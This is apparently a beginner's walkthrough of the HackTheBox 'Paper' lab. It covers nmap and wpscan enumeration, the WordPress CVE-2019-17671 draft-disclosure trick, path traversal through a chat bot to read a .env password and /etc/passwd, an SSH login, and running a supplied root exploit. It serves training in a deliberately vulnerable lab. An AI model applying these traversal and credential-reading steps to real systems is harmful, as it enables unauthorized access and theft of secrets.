This is the walkthrough for Paper lab in HackTheBox (https://app.hackthebox.com/machines/Paper) This is my first public walkthrough for a CTF. I would appriciate any contructive critism and suggestions.

This Lab/CTF focuses on Enumerating skills and LFI skills, it does not focus on Priv-Esc or other things which are unlike other CTFs.

NOTES = Replace <ip> with your machine's IP and i have purposefully redacted my machine's ip with "*".

I used nmap to analyse the IP and see the active ports and services running.

nmap -sC -sV <ip>

nmap -sC -sV **.**.**.***
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-31 03:48 IST
Nmap scan report for office.paper (**.**.**.***)
Host is up (0.26s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 8.0 (protocol 2.0)
| ssh-hostkey: 
|   2048 10:05:ea:50:56:a6:00:cb:1c:9c:93:df:5f:83:e0:64 (RSA)
|   256 58:8c:82:1c:c6:63:2a:83:87:5c:2f:2b:4f:4d:c3:79 (ECDSA)
|_  256 31:78:af:d1:3b:c4:2e:9d:60:4e:eb:5d:03:ec:a0:22 (ED25519)
80/tcp  open  http     Apache httpd 2.4.37 ((centos) OpenSSL/1.1.1k mod_fcgid/2.3.9)
|_http-server-header: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_fcgid/2.3.9
|_http-title: Blunder Tiffin Inc. – The best paper company in the elec...
|_http-generator: WordPress 5.2.3
443/tcp open  ssl/http Apache httpd 2.4.37 ((centos) OpenSSL/1.1.1k mod_fcgid/2.3.9)
|_http-server-header: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_fcgid/2.3.9
|_ssl-date: TLS randomness does not represent time
| tls-alpn: 
|_  http/1.1
|_http-generator: HTML Tidy for HTML5 for Linux version 5.7.28
| http-methods: 
|_  Potentially risky methods: TRACE
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=Unspecified/countryName=US
| Subject Alternative Name: DNS:localhost.localdomain
| Not valid before: 2021-07-03T08:52:34
|_Not valid after:  2022-07-08T10:32:34
|_http-title: HTTP Server Test Page powered by CentOS
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 53.51 seconds  

Visited the IP in browser but it was a test website and nothing interesting.

So i decided to curl

curl -I <IP>

curl -I **.**.**.***
HTTP/1.1 403 Forbidden
Date: Wed, 30 Mar 2022 22:19:52 GMT
Server: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_fcgid/2.3.9
X-Backend-Server: office.paper
Last-Modified: Sun, 27 Jun 2021 23:47:13 GMT
ETag: "30c0b-5c5c7fdeec240"
Accept-Ranges: bytes
Content-Length: 199691
Content-Type: text/html; charset=UTF-8

We notice X-Backend-Server: office.paper, so in order to access this lets add this our hosts list at /etc/hosts

sudo nano /etc/hosts

127.0.0.1	localhost
127.0.1.1	kali
**.**.**.***    office.paper 
# The following lines are desirable for IPv6 capable hosts
::1     localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters

Than i visited office.paper in browser and figured out it was an wordpress website as wordpress.org was mention at bottom of page and i was sure after viewing the page source.

The First thing i do if i find a wordpress website is to scan it with wpscan to look for vulnerabilities and users.

wpscan -e vp vt u --url http://office.paper/

WOOOAH we found that it was using vulnerable wordpress version 5.2.3, which was also found by nmap.

I went to exploit.db and search for WordPress 5.2.3 and found exploit CVE: 2019-17671.
https://www.exploit-db.com/exploits/47690

We just have to put ?static=1 at end of office.paper to reveal secret page in browser.

http://office.paper/?static=1

Here we found that there is another host chat.office.paper so we also add that to our etc/hosts

127.0.0.1	localhost
127.0.1.1	kali
**.**.**.***   office.paper  chat.office.paper
# The following lines are desirable for IPv6 capable hosts
::1     localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters

Upon visiting the chat.office.paper and messing with it i found that the admin DwightKSchrute added a bot called Recyclops.

After messing with Recyclops i figured out that it take certain commands as mentioned in chat but has to start with "recyclops".
recyclops list ./ = ls
recyclops file ./<filename> = cat <filename>

Yes i did LFI by adding ./.
I did not found anything interesting using recyclops list ./ so i decided to go deeper by using

recyclops list ./../

I found user.txt but we didnt have permission to read it.

Their was a unusual file named "hubot", so i listed its contents using

recyclops list ./../hubot/

I read each file content but found password in .env file. I used command

recyclops file ./../hubot/.env

I have PASSWORD but no USERNAME so i listed the /etc/passwd directory. Using

recyclops list ./../../../etc/passwd

We found username dwight.

I ssh into server using credentials found.

ssh dwight@<ip>

Enter the Password you found.
Now you have remote shell access via ssh.

I read user.txt

cat user.txt

This lab did not focused too much on priveledge escalation as i would assume it was about enumeration and LFI.
linpeash.sh and exploit.py was already their in that directory.

You can directory run exploit.py to gain root access by using

python3 exploit.py

If it doesn't work, run the same command again!
or

You can run linpeas.sh to find vulnerablity and find online exploit and tranfer to this machine and run it but it was already given to us i.e exploit.py. To run linpeas.sh use command

./linpeash.sh

or

bash linpeas.sh

Read the Root Flag at /root/root.txt

cat /root/root.txt